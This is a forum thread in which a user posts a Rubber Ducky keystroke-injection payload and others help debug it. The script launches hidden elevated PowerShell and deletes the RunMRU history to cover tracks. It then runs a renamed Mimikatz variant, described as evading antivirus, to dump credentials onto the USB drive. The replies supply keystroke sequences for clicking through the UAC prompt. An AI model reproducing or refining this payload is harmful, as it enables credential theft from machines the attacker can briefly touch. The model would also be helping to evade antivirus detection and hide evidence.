L07TB0Y Posted February 28, 2017 Share Posted February 28, 2017 here is my code DELAY 3000 ESC DELAY 300 GUI r DELAY 500 ENTER STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" DELAY 1000 ALT Y DELAY 1000 LEFTARROW DELAY 300 ENTER DELAY 500 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "FILES"') do @set FILES=%d DELAY 300 ENTER DELAY 1000 STRING if exist %FILES%\lb.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %FILES%\lb.ps1;Invoke-Mimidogz -DumpCreds |Out-File '%FILES%\%computername%_creds.txt';" DELAY 300 ENTER issue 1: THE UAC is not going away by either ALT Y or LEFTARROW and ENTER but even after this if i click OK manually it does not work FILES is the name of rubber ducky lb.ps1 is the customized mimi that does not get detected by AV etc what am i doing wrong? Quote Link to comment Share on other sites More sharing options...
Guest Posted March 1, 2017 Share Posted March 1, 2017 (edited) Just from the look of it, the ENTER is at the wrong place DELAY 3000 ESC DELAY 300 GUI r DELAY 500 ENTER STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" DELAY 1000 ALT Y should be DELAY 3000 ESC DELAY 300 GUI r DELAY 500 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20® delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs" ENTER DELAY 1000 ALT Y Your version might have worked by accident, if the last command the user typed in their run box, was CMD. my advice to you, debug your own scripts by manually executing every line, step by step and see where it goes wrong. Also, keep in mind that a script designed on one version of Windows, might not work on another. The LEFTARROW and ENTER that follow have no function on my Windows 8.1 box. So when asking for help, tell us the OS you're using. Edited March 1, 2017 by Guest Quote Link to comment Share on other sites More sharing options...
Guest Posted March 1, 2017 Share Posted March 1, 2017 regarding the uac screen, try making an extremely easy script and see if any of those successfully bypasses the uac message DEFAULT_DELAY 3000 GUI r STRING regedit ENTER ALT Y or DEFAULT_DELAY 3000 GUI r STRING regedit ENTER LEFTARROW ENTER or DEFAULT_DELAY 3000 GUI r STRING regedit ENTER TAB TAB TAB (number of tabs needed to select "yes") ENTER Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.